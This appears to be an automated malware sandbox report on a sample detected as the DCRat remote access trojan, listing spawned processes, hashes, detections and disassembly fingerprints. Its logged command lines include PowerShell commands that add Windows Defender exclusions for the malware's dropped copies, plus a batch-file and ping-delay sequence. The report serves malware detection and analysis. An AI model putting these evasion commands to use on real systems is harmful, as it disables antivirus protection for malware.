                                                                                          Commandline:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Imagebase:0x200000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:29
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:30
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0xb60000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:31
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:32
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:33
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:34
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:35
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:36
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:37
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0x2e0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\fontdrvhost.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:38
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:39
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:40
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:41
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xcc0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:42
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:43
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:44
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:chcp 65001
                                                                                          Imagebase:0x7ff744bb0000
                                                                                          File size:14'848 bytes
                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:45
                                                                                          Start time:01:28:00
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:ping -n 10 localhost
                                                                                          Imagebase:0x7ff658d30000
                                                                                          File size:22'528 bytes
                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:46
                                                                                          Start time:01:28:07
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff605670000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:47
                                                                                          Start time:01:28:08
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0x820000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:48
                                                                                          Start time:01:28:10
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x90000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:49
                                                                                          Start time:01:28:14
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                          Imagebase:0x7ff67e6d0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:50
                                                                                          Start time:01:28:17
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x750000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:53
                                                                                          Start time:01:28:25
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xd50000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:54
                                                                                          Start time:01:28:33
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x190000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:55
                                                                                          Start time:01:28:42
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xc50000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:56
                                                                                          Start time:01:28:50
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x290000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2908AD Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 73O
                                                                                            • API String ID: 0-410241874
                                                                                            • Opcode ID: 4cae0bd1337df38d64c2a26993ac988c9e7e132459be404273605840c3e94dbf
                                                                                            • Instruction ID: d2021a8cd0121edc59c65b7a6704c7248760fef9da24eb6b8de78fa45b3cf276
                                                                                            • Opcode Fuzzy Hash: 4cae0bd1337df38d64c2a26993ac988c9e7e132459be404273605840c3e94dbf
                                                                                            • Instruction Fuzzy Hash: F1E1A5B190EB8D8FE796EB78C4596997FE0FF56320F0441FEC049CB2A2DA681846C751
                                                                                            Function 00007FFB4B293CF2 Relevance: 1.8, Strings: 1, Instructions: 589COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `,2K
                                                                                            • API String ID: 0-659250162
                                                                                            • Opcode ID: b6e2aa7fa23392ef9bed1dd64d65513b36b6948526be22eadf74a150b816903b
                                                                                            • Instruction ID: f5e58242794af7dfa04f340dd27bd7d391f0613b5701943ebbba2755da643e11
                                                                                            • Opcode Fuzzy Hash: b6e2aa7fa23392ef9bed1dd64d65513b36b6948526be22eadf74a150b816903b
                                                                                            • Instruction Fuzzy Hash: D9120F71B1891D8FDB94FF6CC494AA977E2FF98300B1541B9D01ED72A6DA25EC42CB80
                                                                                            Function 00007FFB4B290630 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_H
                                                                                            • API String ID: 0-372873180
                                                                                            • Opcode ID: 6afa8f07ab8d1136b85dd15b2978f0b1abdee6739d10d0560d6f791b0d53eeca
                                                                                            • Instruction ID: 92ecd4b442f33e0942143f60c41fa4fa14ac66b2bb8d3dd2d47de1d9704fe0c8
                                                                                            • Opcode Fuzzy Hash: 6afa8f07ab8d1136b85dd15b2978f0b1abdee6739d10d0560d6f791b0d53eeca
                                                                                            • Instruction Fuzzy Hash: E79128B150E79A4FD746FBB8C45A1AA7BE1FF59310B1440FEC44ECB2A3DE2858428754
                                                                                            Function 00007FFB4B29054D Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_H
                                                                                            • API String ID: 0-372873180
                                                                                            • Opcode ID: 4b461a4af00bd5924be54969279934485312d61a4de76eb81bc9f809b443dc16
                                                                                            • Instruction ID: f530cb4167aefc8e81068d238e949865b00c30df815c329753a5b3894e336b80
                                                                                            • Opcode Fuzzy Hash: 4b461a4af00bd5924be54969279934485312d61a4de76eb81bc9f809b443dc16
                                                                                            • Instruction Fuzzy Hash: A0513962A0E69A4FD301BB7DD45A1EABBE0FFD533171444BBC28CCB153D928588787A1
                                                                                            Function 00007FFB4B2904B8 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_H
                                                                                            • API String ID: 0-372873180
                                                                                            • Opcode ID: de9065e2103b4a86e1a5db0442e75ef18e844194508b142e3d5cf0fb880c0ca1
                                                                                            • Instruction ID: c434fb7cf6a2a338f065bacf0f6c2902f5098e007d572e7a84ba626b52350cc3
                                                                                            • Opcode Fuzzy Hash: de9065e2103b4a86e1a5db0442e75ef18e844194508b142e3d5cf0fb880c0ca1
                                                                                            • Instruction Fuzzy Hash: DD5128B2A0E6964FD302BB7CD4561EA7BE0EF8933170444FBD588CB163D928484B87A5
                                                                                            Function 00007FFB4B2905F2 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_H
                                                                                            • API String ID: 0-372873180
                                                                                            • Opcode ID: a3f0ddb47d5b308eb735e438dbf7e074a6a53efe16e6c3fcdecd1b5ba9a85417
                                                                                            • Instruction ID: 0e26f17114fb2dab7734d51ce597c9905da79d4fe8883c93bc6586330ff4fbf7
                                                                                            • Opcode Fuzzy Hash: a3f0ddb47d5b308eb735e438dbf7e074a6a53efe16e6c3fcdecd1b5ba9a85417
                                                                                            • Instruction Fuzzy Hash: 524129A250E6AA5FD302BBBC941A1EA7FE0EF5A33071444FED08DCB153DD2808478765
                                                                                            Function 00007FFB4B29523D Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #5O_^R
                                                                                            • API String ID: 0-2697040245
                                                                                            • Opcode ID: 9d2e7ac473f828be1a6c8cdd43a7163229c2460e26b9d5340abc8cea8d8478a6
                                                                                            • Instruction ID: 6cd4fa5935fc93fb924170a0d691f31431bbb38bf3a797fa511c16e118613156
                                                                                            • Opcode Fuzzy Hash: 9d2e7ac473f828be1a6c8cdd43a7163229c2460e26b9d5340abc8cea8d8478a6
                                                                                            • Instruction Fuzzy Hash: EEE04F74F0821FCBE700FFA4C8449FEB7B0FB51311F008A25D425A6290DB78A6448B80
                                                                                            Function 00007FFB4B293BB8 Relevance: .5, Instructions: 537COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6a0202f95058c385c67a56950b71f64217dd511ac5186a8bfd3301f31d98937e
                                                                                            • Instruction ID: c1829ec324480226103a440bb53e91a07027d0b8194b01c91d3bf6c13c886099
                                                                                            • Opcode Fuzzy Hash: 6a0202f95058c385c67a56950b71f64217dd511ac5186a8bfd3301f31d98937e
                                                                                            • Instruction Fuzzy Hash: 02022E70B1890D8FDB98FF2CC494A6977E2FF98304B1541B9D51EC72A6DA25EC42CB80
                                                                                            Function 00007FFB4B2932E4 Relevance: .5, Instructions: 500COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d7761089518b6464c7e5d9c03ace1672cadbafa8fa7ff04f21eae468abe9ffb
                                                                                            • Instruction ID: 80fad0c78136c687410fbe3707ff0b46b34fe832d1be03fae7675cdfbe729e99
                                                                                            • Opcode Fuzzy Hash: 4d7761089518b6464c7e5d9c03ace1672cadbafa8fa7ff04f21eae468abe9ffb
                                                                                            • Instruction Fuzzy Hash: 44E195B1B1C94E4FEBA5FA78D5456BA7BF1EF58350F20817AC10DC71A6DD28A8428740
                                                                                            Function 00007FFB4B294064 Relevance: .4, Instructions: 353COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40d70baf9cf5d05272bee06ad80cca4a73b005aa048c101969a6a59431b85b00
                                                                                            • Instruction ID: 0ed897b8de26faa887e63abbb216cd3d2e26e7db7e70be3eb945c7a7b001d5a5
                                                                                            • Opcode Fuzzy Hash: 40d70baf9cf5d05272bee06ad80cca4a73b005aa048c101969a6a59431b85b00
                                                                                            • Instruction Fuzzy Hash: C9B13B70B1890D8FDBA8FE6CC454A6877E1FF98314B1541B9D11EC72A1DA25AC42CB40
                                                                                            Function 00007FFB4B293FE8 Relevance: .3, Instructions: 335COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55c39b721b5c77cd024623f608307fc8acaaeedededaeca90be27818fb4f990f
                                                                                            • Instruction ID: d6356a70e4c89138440984db2f5382db4a2f0830019bd22f66b2773c4c574093
                                                                                            • Opcode Fuzzy Hash: 55c39b721b5c77cd024623f608307fc8acaaeedededaeca90be27818fb4f990f
                                                                                            • Instruction Fuzzy Hash: D7B11C71B1890D8FDBA8FA6CD494B6877E2FF98314F1541B9D11EC72A1DA25EC42CB40
                                                                                            Function 00007FFB4B294021 Relevance: .3, Instructions: 335COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 506630af77ba28b9a195d85f5ecd1444f09c0faf8a76bb42a63c5c336b08722d
                                                                                            • Instruction ID: 6216faa01dd3a2c50b213a1dfcd3e9aa48d6ba2de522e9975de780d6d875d4b1
                                                                                            • Opcode Fuzzy Hash: 506630af77ba28b9a195d85f5ecd1444f09c0faf8a76bb42a63c5c336b08722d
                                                                                            • Instruction Fuzzy Hash: 45B12C71B1890D8FDBA8FE6CD454B6877E1FFA8314B1541B9D11EC72A1DA25EC42CB40
                                                                                            Function 00007FFB4B294096 Relevance: .3, Instructions: 333COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
